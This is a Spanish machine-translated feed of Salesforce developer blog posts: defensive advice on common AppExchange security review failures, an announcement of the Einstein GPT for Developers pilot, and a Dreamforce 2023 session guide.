#12: JavaScript en Salesforce DOM (solo experiencia clásica)

¿Qué es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicación Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicación en las páginas de Visualforce que usted controla, de modo que el JavaScript personalizado esté esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pestañas web, componentes de página de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podría ser motivo de falla).

¿Cómo puedo abordar esto?

Esto es algo que deberá verificar manualmente en el código fuente de su paquete Salesforce. Verifique y asegúrese de que no haya utilizado JavaScript para crear botones personalizados, pestañas web, componentes de la página de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado esté incluido solo en el dominio de su aplicación con espacio de nombres en las páginas de VisualForce que controla como parte de su aplicación.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicación (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, asegúrese de eliminarlo. Incluso si su aplicación solo está destinada a usarse en Lightning Experience, si la vulnerabilidad está presente para los usuarios en modo Clásico, el paquete no se puede aprobar.

Esta regla en particular no está especialmente bien documentada, pero puede leer más en el documento Lista de verificación de revisión de seguridad de AppExchange (se requiere iniciar sesión en la comunidad de socios).

#13 — Divulgación de información en páginas de error y excepciones

¿Qué es esto?

En el contexto de la revisión de seguridad de AppExchange, este término se refiere específicamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus páginas de error muestran datos confidenciales del sistema o información de depuración. Por ejemplo, a veces las páginas de error incluyen seguimientos de pila completos que muestran cómo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde está instalada la aplicación. A veces, incluso la información confidencial queda expuesta de esta manera.

¿Cómo puedo abordar esto?

Busque en su base de código llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no válidas, entradas vacías, entradas demasiado largas, acceso a páginas internas sin autenticación, omisión de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

También puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a través de esta guía de OWASP .

#14 — Componentes de Aura: componente externo de CSS

¿Qué es esto?

Se supone que los componentes de Aura son pequeños, autónomos, reutilizables y reposicionables. CSS que evita la encapsulación de componentes (a través de .THIS) o que utiliza un posicionamiento no estándar (por ejemplo, flotante o posición: absoluta o fija) infringe estas garantías y puede interferir con la visualización de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la razón principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el diseño del sitio web de Salesforce y viola el espíritu del modelo de seguridad de Lightning, donde los componentes están estrictamente aislados y se garantiza que permanecerán en su propio carril.

¿Cómo puedo abordar esto?

Este es otro problema que debes verificar manualmente. Básicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. También recomendamos revisar nuestra documentación para asegurarse de que está siguiendo todas las reglas CSS correctas.

#15 — Canal de mensajes expuesto

¿Qué es esto?

Este término se refiere específicamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

¿Cómo puedo abordar esto?

Tiene dos opciones, según su caso de uso, que incluyen:

Registre un ticket de soporte para solicitar que se habilite la eliminación de componentes administrados para su paquete u organización de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectaría la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (asegúrese de mencionar esto específicamente en un mensaje falso). documento positivo sobre su presentación).
Si tiene que utilizar un componente de canal LMS, asegúrese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice únicamente el componente recién creado en el código.

Más información está disponible en la documentación .

#16 – Información confidencial en URL

¿Qué es esto?

Esto se refiere a una situación en la que se envía información confidencial de larga duración en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contraseña). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
Los motores de búsqueda indexan URL y almacenan inadvertidamente información confidencial
Almacenamiento de rutas URL completas en el historial del navegador local, caché del navegador, marcadores y marcadores sincronizados entre dispositivos
Información de URL enviada a aplicaciones web de terceros a través del encabezado de referencia o expuesta a scripts de terceros en la página

¿Cómo puedo abordar esto?

Burp Suite puede ayudarle aquí para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicación para detectar cualquier caso en el que se envíen secretos a largo plazo a través de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su método de autenticación (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores métodos de almacenamiento de secretos.

La guía OWASP es un gran recurso a seguir.

#17 – Punto final inseguro

¿Qué es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

¿Cómo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma aún más segura de verificar esto es buscar en el código fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco más sobre cómo esto mejora la seguridad en esta página de OWASP .

#18 — Enumeración de nombre de usuario o correo electrónico

¿Qué es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situación en la que los atacantes pueden enumerar listas de nombres de usuario o correos electrónicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesión, funciones de olvido de contraseña o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contraseñas reutilizadas de bases de datos comprometidas y fugas o volcados de contraseñas.

¿Cómo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperación de contraseñas, intentos de inicio de sesión, etc., y asegúrese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electrónico ingresado es válido.

Por ejemplo, muchos sitios incluyen un mensaje genérico, como: "Si dicho usuario existe, recibirá un correo electrónico con un restablecimiento de contraseña". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electrónico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeración por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, también puede revisar sus funcionalidades de inicio de sesión manualmente.

OWASP tiene una guía útil para evitar la enumeración de correos electrónicos y nombres de usuarios.

#19 — Gestión de contraseñas

¿Qué es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener políticas de contraseñas problemáticas, como por ejemplo:

Permitir la reutilización de la misma contraseña cuando es necesario restablecerla
No solicitar la contraseña anterior cuando se permite a los usuarios establecer una nueva contraseña
Para restablecer la contraseña, enviar una contraseña temporal al correo electrónico de un usuario en texto sin formato
Dejar contraseñas predeterminadas en los usuarios raíz del servidor o de la base de datos

¿Cómo puedo abordar esto?

Además de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticación de OWASP para obtener algunas pautas sobre cómo establecer políticas de contraseñas seguras:

Burp Suite también es muy útil para identificar problemas relacionados con las contraseñas (por ejemplo, puede usarlo para intentar forzar sus páginas de inicio de sesión).

#20 – Eco de contraseña

¿Qué es esto?

Esto es un poco diferente del problema de administración de contraseñas descrito anteriormente. Un eco de contraseña se refiere a situaciones en las que las contraseñas se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia página de configuración) o en llamadas API/respuestas JSON.

¿Cómo puedo abordar esto?

Asegúrese de que su contraseña no se revele ni se transmita en texto sin formato en ninguna parte de su aplicación. Asegúrese de que en las páginas de configuración u otras páginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el botón si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contraseñas de OWASP para obtener más información.

Burp Suite , o quizás Chimera u OWASP ZAP , también pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su solución incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organización. Burp Suite es una de las mejores herramientas de seguridad del mercado y también la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prepárate para invertir más tiempo en términos de revisión manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

Salesforce Product Security también utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el código fuente del paquete Salesforce. También utilizan la base de datos CVE y el escáner Qualys SSL en la mayoría de los envíos.

Si tiene problemas de seguridad y necesita orientación técnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a través del Portal de seguridad para socios .

Por último, no podemos recomendar lo suficiente Trailhead en términos de preparación para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y también acabamos de renovar el módulo Revisión de seguridad de AppExchange , que analiza el proceso de envío de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista técnica en Salesforce. Ha estado trabajando con el equipo de revisión de seguridad de AppExchange en Salesforce desde 2017, y su función actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

A PI admin administración administrador Administradores ai AMA Análisis Analizador de código Analizador de código de Salesforce apex API apis Aplicaciones aplicaciones de salesforce AppExchange Apps Arquitecto Arquitectos Arquitectura Aura Blogs Burp Suite Business CI cli Code Analyzer Código abierto Código VS Cómo Componente Lightning Componentes Web Lightning Comunidad Comunidades Configuración personalizada Connect Conocimiento consulta control de versiones Correo electrónico CRO css cuenta Data Datos desarrollador Desarrolladores desarrolladores de Salesforce Desarrollo desarrollo de aplicaciones Dev DF DFA Distribución de aplicaciones DML documentación EGA Futura Empresa ERP Evento Eventos flow flujo Flujos Force.com Funciones Funciones de Salesforce ga Genie Herramientas html INCLUDE INCLUDES INCLUIR INCLUYE inicio inicio del sendero Integraciones interfaz de usuario isExposed ISV java javascript json Lead Lightning Lightning Experience Lightning Web Component Lightning Web Components lightning web security lwc LWS Marca mensaje de error ML oauth Objeto Ohana Otros Paquetes PCI Performance Plataforma Plataforma Salesforce Podcast Proceso Product Producto productos Prueba pruebas Quip REGEX Registro Rendimiento Respuesta Respuestas REST revisión de seguridad revisión de seguridad de AppExchange revisiones Salesforce Salesforce Code Analyzer salesforce desarrollador Salesforce.com security seguridad Seguridad e identidad Seguridad Lightning seguridad web lightning Slack Soporte soql SOSL sql Tecnología Tema TI trailhead UI Validación de entrada Validar Versión Versiones VS Code

Einstein GPT para desarrolladores: ahora en versión piloto ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

Einstein GPT para desarrolladores: ahora en fase piloto | Blog de desarrolladores de Salesforce

La IA generativa es una tecnología transformadora que aumenta la productividad de los desarrolladores, acelera el desarrollo de aplicaciones de software y reduce la barrera para que cualquiera aprenda a programar. En el TrailblazerDX de este año, anunciamos Einstein GPT para desarrolladores , la solución de inteligencia artificial generativa de Salesforce que libera la productividad de los desarrolladores y les permite desarrollar Salesforce más rápido . Hoy, estamos encantados de anunciar que Einstein GPT para desarrolladores ahora está en piloto cerrado.

Creado específicamente para lenguajes y marcos de Salesforce, Einstein GPT para desarrolladores puede generar código Apex utilizando lenguaje natural. El soporte para LWC llegará pronto. Nuestro objetivo es que esté disponible en Beta abierta en Dreamforce 23 , para que todos puedan tener acceso a la herramienta. En este blog, exploraremos cómo comenzar con Einstein GPT para el desarrollo de Apex y cómo su potencial puede revolucionar su proceso de desarrollo.

Einstein GPT para desarrolladores frente a otras herramientas de codificación de IA

Las herramientas de codificación de IA generativa disponibles en la actualidad se entrenan principalmente en lenguajes públicos, como Java, Python y otros, así como en código disponible públicamente. Dado que los lenguajes específicos de Salesforce, como Apex y LWC, son propietarios, estas herramientas a menudo carecen de la capacitación necesaria para brindar recomendaciones precisas.

Además, las herramientas de codificación de IA son tan poderosas como el contexto que se les proporciona. Dado que estas herramientas de codificación públicas carecen del contexto de Salesforce de su organización, como los metadatos, las recomendaciones pueden ser inexactas o insuficientes para satisfacer sus necesidades. Por último, el uso de herramientas de inteligencia artificial disponibles públicamente expone su código privado más allá del límite de confianza de Salesforce y podría hacerlo público, una posible vulnerabilidad de seguridad.

Con Einstein GPT para desarrolladores, utilizamos CodeGen , nuestro propio modelo de código abierto para la síntesis de programas. Hospedamos CodeGen dentro del límite de confianza de Salesforce y lo hemos capacitado en lenguajes específicos de Salesforce como Apex y LWC. Con una base dinámica incorporada al proceso de generación de código, Einstein GPT enriquece sus recomendaciones utilizando sus metadatos y código. Nuestra capa de confianza de IA dentro de Einstein GPT garantiza que sus datos y código permanezcan seguros dentro de Salesforce y nunca se almacenen externamente.

Comience con Einstein GPT para desarrolladores

Einstein GPT para desarrolladores se encuentra actualmente en una fase piloto cerrada. Nuestro plan es que esté disponible en Open Beta para Dreamforce 2023. Una vez que su organización esté habilitada para esta herramienta, puede instalar la extensión Einstein GPT en su VS Code Desktop usando un archivo VSIX compartido. Einstein GPT también estará disponible en Code Builder , nuestro IDE basado en web, que se espera que esté disponible de forma general en octubre. ¡Estén atentos a las actualizaciones!

Para utilizar la herramienta Einstein GPT para desarrolladores de forma eficaz:

Abra su VS Code, vaya a Archivo > Abrir carpeta en el menú y abra un proyecto de Salesforce DX existente o configure un nuevo proyecto.
Para trabajar con Einstein GPT para desarrolladores, ejecute el comando SFDX: Autorizar una organización para conectarse a una organización sandbox o a una organización borrador de Salesforce. Podrá utilizar Einstein GPT para desarrolladores dentro de este entorno.

Si está utilizando organizaciones borrador, active Einstein GPT para desarrolladores habilitando la función adicional de organización borrador. Simplemente edite y guarde el archivo config/project-scratch-def.json en su proyecto DX y agregue la función EinsteinGPTForDevelopers a su lista de funciones existente.

Por ejemplo:

Finalmente, puede comenzar a generar código Apex escribiendo un mensaje mediante el comando Paleta de comandos: SFDX: generar código con Einstein GPT (ver captura de pantalla a continuación) . Tenga en cuenta que debe estar dentro de un archivo Apex ( .cls ) para que aparezca el comando.

A continuación se muestra un mensaje de ejemplo:

Quiero crear una clase de Apex. Llamémoslo OpportunityQuerySelector. Cree un método llamado getSumOfOpportunityRecords que recupere la cantidad de registros de oportunidades vinculados a un registro de cuenta específico. El método debe aceptar accountId como parámetro. Siga las mejores prácticas de seguridad y asegúrese de que el código se ejecute en el modo de usuario.

Y luego el resultado se muestra a continuación.

Si bien el código generado anteriormente no requirió muchas ediciones, es posible que necesite personalizar la salida generada por Einstein GPT según sus necesidades durante el desarrollo. El panel Einstein GPT: Historial y comentarios dentro del IDE le permite compartir comentarios sobre el resultado generado. ¡Estos comentarios son imprescindibles para ayudarnos a capacitar a nuestro LLM y mejorar su resultado! Estamos emocionados de escuchar sus comentarios.

Transformando el proceso de desarrollo

Recién estamos comenzando con la IA generativa para transformar su flujo de trabajo de desarrollo. Mira lo que viene pronto:

Compatibilidad con Lightning Web Component (LWC): genere código LWC basado en el procesamiento del lenguaje natural (NLP)
Finalización predictiva de código en línea: complete automáticamente la siguiente línea de código sugerida con metadatos contextuales del proyecto.
Verificación del rendimiento del código: escanee el código Apex y corrija errores de tiempo de ejecución durante el proceso de desarrollo
Asistencia conversacional: Pídale a Einstein que genere código contextual y documentación, explique el código o resuelva problemas complejos.

Conclusión

A medida que Einstein GPT para desarrolladores amplíe sus capacidades para admitir LWC, proporcionar finalización de código inteligente y brindar asistencia conversacional, podrá desarrollar la plataforma Salesforce más rápido que nunca. Nuestro objetivo es que esté disponible en Beta abierta en Dreamforce 2023 , para que todos puedan tener acceso a la herramienta. ¡Únase a nosotros en Dreamforce '23 para jugar y profundizar en Einstein GPT para desarrolladores!

Recursos adicionales

Sobre el Autor

Mohith Shrivastava es desarrollador defensor en Salesforce con una década de experiencia en la creación de productos a escala empresarial en la plataforma Salesforce. Mohith se encuentra actualmente entre los principales contribuyentes de Salesforce Stack Exchange, un foro de desarrolladores donde los desarrolladores de Salesforce pueden hacer preguntas y compartir conocimientos. Puedes seguirlo a través de LinkedIn .

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

admin administrador Administradores ai AMA Anuncios apex Apex Code Aplicaciones Arquitecto Arquitectos Automatización beta Beta abierta Blogs CI code builder Código abierto Código Apex Código VS Cómo Componente web Lightning Comunidad Conectar Connect Conocimiento cuenta Data Datos desarrollador desarrollador de salesforce Desarrolladores desarrolladores de Salesforce Desarrollo desarrollo de aplicaciones Dev Developers documentación Dreamforce Dreamforce 2023 Dreamforce 23 EGA Futura Einstein Einstein GPT Empresa flujo Force.com Funciones ga Herramientas html IA generativa inteligencia inteligencia artificial intercambio de pila java json Lead Lightning Lightning Web Component lwc ML Ohana Open Beta Oportunidad Otros Pantalla Pilot Piloto Plataforma Plataforma Salesforce Podcast Preguntas Proceso Product Productividad Producto productos Registro Rendimiento Salesforce Salesforce.com sandbox seguridad SFDX SFDX: Autorizar una organización Slack Soporte stack exchange Tecnología TI Trailblazer TrailblazerDX UI Versión VS Code

La guía para desarrolladores de Salesforce para Dreamforce 2023 ☁️

El enlace a la publicación original, lo encontrarás al final de este artículo.

…

La guía del desarrollador de Salesforce para Dreamforce 2023 | Blog de desarrolladores de Salesforce

¡Llamando a todos los desarrolladores de Salesforce! ¿Estás listo para experimentar la magia de AI + Datos + CRM en Dreamforce 2023? Hemos preparado una experiencia repleta de tres días como ninguna otra, así que prepárate para aprender, conectarte, divertirte y retribuir rodeado de compañeros innovadores en la conferencia de tecnología más grande del mundo.

Sabemos que está contando ansiosamente los días hasta que comience Dreamforce, así que siga leyendo para comenzar a planificar su experiencia Dreamforce perfecta, desde conferencias magistrales hasta sesiones en Developer Track y demostraciones prácticas en acción en Developer Grove.

Vea la última tecnología en la conferencia magistral sobre el futuro del desarrollo

AI + Data + CRM están cambiando rápidamente el futuro de los negocios y los desarrolladores están a la vanguardia. Únase al presidente y director de ingeniería, Srini Tallapragada, y a invitados especiales para aprender todo sobre el futuro del desarrollo y cómo puede aprovechar la IA en su trabajo.

Si asistirá a Dreamforce en persona, asegúrese de agregar la conferencia magistral a su agenda . Si lo seguirá desde casa, vea la conferencia magistral completa mientras se transmite en vivo en Salesforce+ .

📅 Marque sus calendarios: jueves 14 de septiembre, de 1:30 a 2:20 p. m., hora del Pacífico
🎤 Oradores destacados: Srini Tallapragada, Alba Rivas, Adam White, Kat Holmes, Chris Peterson, Avanthika Ramesh
❗ Añadir a tu agenda

Descubra los aspectos más destacados de la versión para desarrolladores en Developer Preview Live

Eche un primer vistazo a las principales funciones, herramientas e innovaciones para desarrolladores de la versión Winter '24. Vea demostraciones en vivo de interesantes innovaciones de productos y haga preguntas a nuestros expertos en productos. Hay tantas innovaciones nuevas para los desarrolladores en esta versión que ¡no querrás perderte esto!

📅 Marque sus calendarios: jueves 14 de septiembre, de 2:30 a 3:30 p. m., hora del Pacífico
🎤 Oradores destacados: Aditya Naag Topalli, Mohith Shrivastava, Ewald Hofman, Danielle Larregui, Greg Whitworth, Akshata Sawant, Sarah Welker
❗ Añadir a tu agenda

Mejora tus habilidades en la ruta de desarrollador

Developer Track ofrece una combinación de sesiones de teatro de 20 minutos en Developer Theatre y sesiones de trabajo de 40 minutos. Espere asimilar las mejores prácticas, consejos y mucha inspiración. ¡Y hay algo para todos, sin importar los temas que te apasionen! Tenemos sesiones para todos los niveles (principiante, intermedio, avanzado) en todas las funciones y temas: IA generativa, nube de datos, DevOps Center, MuleSoft, Code Builder, Apex, AppExchange, Lightning Web Components, Slack, seguridad, accesibilidad y más.

📍 Las sesiones de calentamiento se ubicarán en todo Trailblazer Forest: en Developer Theatre junto a Developer Grove, Redwood Theatre, Einstein Theatre, Data Cloud Theatre y Olympic Theatre. Las sesiones de trabajo de Developer Track se llevarán a cabo en el segundo y tercer piso de Moscone West. Asegúrese de consultar su agenda para conocer la ubicación exacta de las habitaciones.

Para encontrar estas sesiones en el catálogo de sesiones de Dreamforce , seleccione Función en la navegación izquierda y marque Desarrollador para ver todas las sesiones etiquetadas para desarrolladores.

Algunas sesiones imperdibles para agregar a tu agenda ✏️

Descubra el poder de Einstein GPT para desarrolladores
Qué esperar: La IA generativa ha arrasado en el mundo de la tecnología. Conozca las capacidades más recientes de Einstein GPT y cómo los desarrolladores pueden utilizar la tecnología para crear sus propias aplicaciones impulsadas por IA en Salesforce.
Oradores destacados: Stephan Chandler-García, Ananya Jha
❗ Añade esta sesión a tu agenda

Comprensión de la nube de datos para desarrolladores de Salesforce
Qué esperar: aprenda qué significa Data Cloud para los desarrolladores, cómo se exponen sus artefactos como metadatos de plataforma familiares y cómo ingerir e interactuar con sus datos mediante SQL, Apex, Flows, API y SDK.
Oradores destacados: Aditya Naag Topalli, Danielle Larregui
❗ Añade esta sesión a tu agenda

¿Quieres un mejor código? Einstein GPT y Code Analyzer pueden ayudar
Qué esperar: Impulse el desarrollo de Salesforce con el dúo dinámico de Einstein GPT para desarrolladores y Code Analyzer. Aprenda cómo optimizar la generación y validación de código directamente desde las experiencias IDE.
Oradores destacados: Gordon Bockus, Vivek Chawla
❗ Añade esta sesión a tu agenda

Componentes web Lightning: novedades y novedades
Qué esperar: aprenda cómo puede utilizar Lightning Web Components para hacer que el desarrollo en Salesforce sea más fácil y eficiente. Vea las últimas funciones disponibles para LWC y lo que se avecina en la hoja de ruta.
Oradores destacados: Alicia Teo, Alice Oh, Leo Balter
❗ Añade esta sesión a tu agenda

Hoja de ruta de Apex: novedades y novedades
Qué esperar: Los gerentes de producto de Salesforce profundizarán en las funciones lanzadas recientemente y en el futuro en la hoja de ruta de Apex, incluido Einstein GPT para desarrolladores.
Oradores destacados: Daniel Ballinger, Chris Peterson
❗ Añade esta sesión a tu agenda

Aumente la productividad de los desarrolladores con GraphQL e IA generativa
Qué esperar: Sumérgete en la nueva API GraphQL, donde las consultas y mutaciones se pueden combinar en una sola solicitud, ganando rendimiento y flexibilidad. Eche un vistazo a cómo redactar consultas con IA generativa.
Oradores destacados: Julián Duque, Ben Sklar
❗ Añade esta sesión a tu agenda

Desarrollar componentes web Lightning para dispositivos móviles sin conexión
Qué esperar: ¿ Usuarios móviles sin conexión? Aprenda cómo habilitarlos con componentes web Lightning personalizados para mostrar e incluso actualizar registros mientras un dispositivo móvil está desconectado de Internet.
Oradora destacada: Angela Le
❗ Añade esta sesión a tu agenda

Gestionar dependencias y conflictos en el Centro DevOps
Qué esperar: profundice en cómo los desarrolladores utilizan DevOps Center para gestionar el ciclo de vida del desarrollo de software. Comience con DevOps Center y aprenda a solucionar los problemas más comunes, como la resolución de conflictos.
Oradores destacados: Gilson Canario, Francisco Sammartino
❗ Añade esta sesión a tu agenda

Cinco cosas que los desarrolladores de Salesforce deben saber sobre MuleSoft
Qué esperar: Únase a esta sesión para conocer los conceptos clave de MuleSoft que necesita saber como desarrollador de Salesforce. Nos centraremos en las mejores prácticas, consejos y trucos, antipatrones y más con ejemplos en vivo.
Oradores destacados: Gaurav Kheterpal, Akshata Sawant
❗ Añade esta sesión a tu agenda

Pon a prueba tus habilidades en Developer Grove

Developer Grove, ubicado en Trailhead Forest, es el hogar de los desarrolladores durante Dreamforce y el lugar para comenzar su viaje de aprendizaje de tres días .

Nuestra principal atracción este año es una competencia estilo arcade que pone a prueba tus habilidades de ingeniería en IA. ¡Completa tantos desafíos como puedas en el menor tiempo posible para que tu nombre aparezca en la tabla de clasificación y puedas presumir de ello!

Visite la estación de demostración que cubre nuestras aplicaciones de muestra y recetas de código, y descubra cómo puede utilizarlas en su propio trabajo. Cada estación contará con empleados de Salesforce que saben lo que hacen y les encanta ayudar a otros a aprender.

❗Novedad de este año: Estación de consultas 1:1 en Developer Grove. Los desarrolladores de Salesforce pueden registrarse para una consulta individual de 20 minutos con profesionales expertos de Salesforce. Para reservar una consulta individual, visite esta página y seleccione el tema "Desarrollador de Salesforce". Cuando haya terminado de registrarse, se le enviará una confirmación por correo electrónico y estará disponible en la aplicación Salesforce Events; descárguela ahora en App Store o Google Play Store .

Otras cosas a tener en cuenta 👀

Conferencia principal de Dreamforce

Únase al director ejecutivo de Salesforce, Marc Benioff, junto con invitados especiales en el discurso principal de Dreamforce para escuchar todo sobre nuestras innovaciones más recientes.

📅 Marque sus calendarios: martes 12 de septiembre, de 10 a. m. a 12 p. m., hora del Pacífico
❗ Añade la keynote a tu agenda

Fiel al foro principal de clientes

Únase al cofundador y director de tecnología Parker Harris en el foro anual de clientes True to the Core. Escuche a los líderes de productos compartir los aspectos más destacados de nuestra hoja de ruta de productos. Si nunca ha asistido, esta es una excelente sesión para que los desarrolladores pregunten y escuchen las respuestas de nuestros gerentes de producto. ¡Una cosa que seguirá siendo “central” en True to the Core es que habrá muchas preguntas!

📅 Marque sus calendarios: jueves 14 de septiembre, de 11:30 a. m. a 12:30 p. m., hora del Pacífico
❗ Añade esta sesión a tu agenda

Conferencia magistral de TI: cree su cliente 360 con IA confiable

Aprenda cómo resolver sus desafíos de TI más difíciles con IA + Datos + CRM. Escuche cómo los pioneros utilizan las últimas innovaciones de plataforma, nube de datos y MuleSoft para crear entornos de TI de próxima generación, con potentes capacidades de IA generativa integradas.

📅 Marque sus calendarios: martes 12 de septiembre, de 2:30 a 3:20 p. m., hora del Pacífico
❗ Añade esta sesión a tu agenda

Celebración pionera de la noche 1

Recuperaremos la diversión la primera noche de Dreamforce. Únase a nosotros en Trailblazer Forest de 5 a 6:30 p. m. el martes 12 de septiembre en Admin Meadow, Developer Grove y Community Cove para actividades sociales, comidas ligeras y bebidas.

Pistas de administrador y arquitecto

¿Busca diversificar su agenda en Dreamforce este año? Consulte todas las sesiones de código y de código bajo en la sección de administración y en la sección de arquitecto . Para obtener más información sobre cada uno, lea la Guía del administrador de Dreamforce 2023 .

Obtenga aún más contenido de Dreamforce 2023 en Salesforce+

¿No puedes asistir a Dreamforce en persona? Durante los tres días, las conferencias magistrales y las sesiones seleccionadas se transmitirán en vivo en Salesforce+. Habrá dos canales y 72 horas de transmisión en vivo. Además de la experiencia en vivo, más de 120 episodios bajo demanda estarán disponibles para verlos después de que finalice Dreamforce en cualquier momento y lugar.

Regístrese en Salesforce+ ahora para obtener acceso a todo el contenido exclusivo.

Empieza ahora

¡Dreamforce 2023 estará aquí antes de que te des cuenta! Siga estos pasos para prepararse:

Regístrese para asistir a Dreamforce si aún no lo ha hecho.
Agregue el discurso de apertura sobre el futuro del desarrollo y la vista previa de la versión para desarrolladores a su agenda.
Complete Road to Dreamforce 2023 Trailhead Quest antes de las 11:59 p. m. (hora del Pacífico) del 11 de septiembre de 2023 para desbloquear una insignia comunitaria exclusiva y participar para tener la oportunidad de ganar* una de las 25 codiciadas sudaderas con capucha Trailblazer o una de las 50 camisetas Dreamforce.* Se aplican las reglas oficiales . Consulte la página Trailhead Quests para obtener todos los detalles.
Descargue la aplicación Salesforce Events en App Store o Google Play Store para realizar un seguimiento de todo lo que hay en su agenda en un lugar de fácil acceso.
Conéctese con sus pares en el grupo comunitario Salesforce Developers Trailblazer.
Si no asiste en persona, asegúrese de registrarse para la experiencia Salesforce+.
Seguir @salesforcedevs en Twitter y LinkedIn para obtener más actualizaciones.

Sobre el Autor

Kaitlin Benz es especialista sénior en marketing de desarrolladores en Salesforce. Lo que más le apasiona es la narración de historias, los podcasts y la comida vegana. Encuéntrala en LinkedIn .

Obtenga las últimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a través de Slack o RSS.

Añadir a holgura Suscríbete a RSS

Seguir leyendo

accesibilidad Actividad Actualizar registros admin administración administrador Administradores ai AMA apex API API GraphQL apis Aplicaciones AppExchange Apps Architect Arquitecto Arquitectos Aura Blogs Business Calendario Carrera CI cli cliente 360 Cloud Code Analyzer code builder código bajo Cómo Componentes Web Lightning Comunidad Comunidad Trailblazer Conectar conexión Connect consulta Correo electrónico CRM cuenta Data Data Cloud Datos desarrollador desarrollador de salesforce Desarrolladores desarrolladores de Salesforce Desarrollo Destacado Destacados destacados de la versión Dev Developers DevOps DevOps Center DF DF23 dispositivos móviles Dreamforce Dreamforce 2023 EGA Futura Einstein Einstein GPT ERP Eventos Experiencia de desarrollador flow Flows Force.com Funciones ga Genie Google GraphQL grupo Herramientas html IA generativa la oportunidad Lead LEx Lightning Lightning Web Component Lightning Web Components lwc Marketing ML Móvil MuleSoft Negocio Negocios Novedades Nube Nube de datos Ohana Oportunidad Otros pionera pionero Plataforma Podcast Preguntas Product Productividad Producto productos Prueba Registro Rendimiento Respuesta Respuestas REST Retribuir Salesforce salesforce developer Salesforce.com SDK seguridad Slack sql Tecnología Tema Temas TI Trailblazer trailhead twitter UI Versión
